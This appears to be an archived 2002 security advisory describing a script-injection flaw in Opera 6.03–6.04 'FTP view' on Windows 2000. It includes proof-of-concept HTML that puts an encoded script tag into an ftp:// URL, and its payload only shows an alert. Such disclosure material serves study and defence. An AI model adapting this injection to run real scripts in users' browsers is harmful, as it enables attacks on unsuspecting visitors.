TUCoPS :: Browsers :: win5608.htm

Opera 'FTP view' Script Execution vulnerability
7th Aug 2002 [SBWID-5608]
COMMAND

	Opera 'FTP view' Script Execution vulnerability

SYSTEMS AFFECTED

	Windows2000 SP2 Opera 6.03 Windows2000 SP2 Opera 6.04

PROBLEM

	Eiji          "James"          Yoshida          [zaddik@geocities.co.jp]
	[http://www.geocities.co.jp/SiliconValley/1667/index.htm] posted :
	

	

	Opera allows running Malicious Scripts due to a bug in  'FTP  view'.  If
	you click on a malicious link, the script  embedded  in  URL  will  run.
	This problem is in 'FTP view'.  The  '<title>URL</title>'  is  not
	escaped.
	 

	 Exploit code:

	 ~~~~~~~~~~~~~

	

	<html>

	<head>

	<META http-equiv="Refresh" content="5 ; url=ftp://%3c%2ftitle%3e%3cscript%3ealert(%22exploit%22)%3b%3c%2fscript%3e@[FTPserver]/">

	</head>

	<body>

	<script>window.open("ftp://[FTPserver]/");</script>

	</body>

	</html>

	

	

	 Example:

	 ~~~~~~~~

	

	

	<html>

	<head>

	<META http-equiv="Refresh" content="5 ; url=ftp://%3c%2ftitle%3e%3cscript%3ealert(%22exploit%22)%3b%3c%2fscript%3e@ftp.opera.com/">

	</head>

	<body>

	<script>window.open("ftp://ftp.opera.com/");</script>

	</body>

	</html>

	

	 

	 Demonstration:

	 ~~~~~~~~~~~~~~

	

	http://www.geocities.co.jp/SiliconValley/1667/advisory04e.html

	

	

	

SOLUTION

	 Workaround:

	 ~~~~~~~~~~~

	

	Disable JavaScript.

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH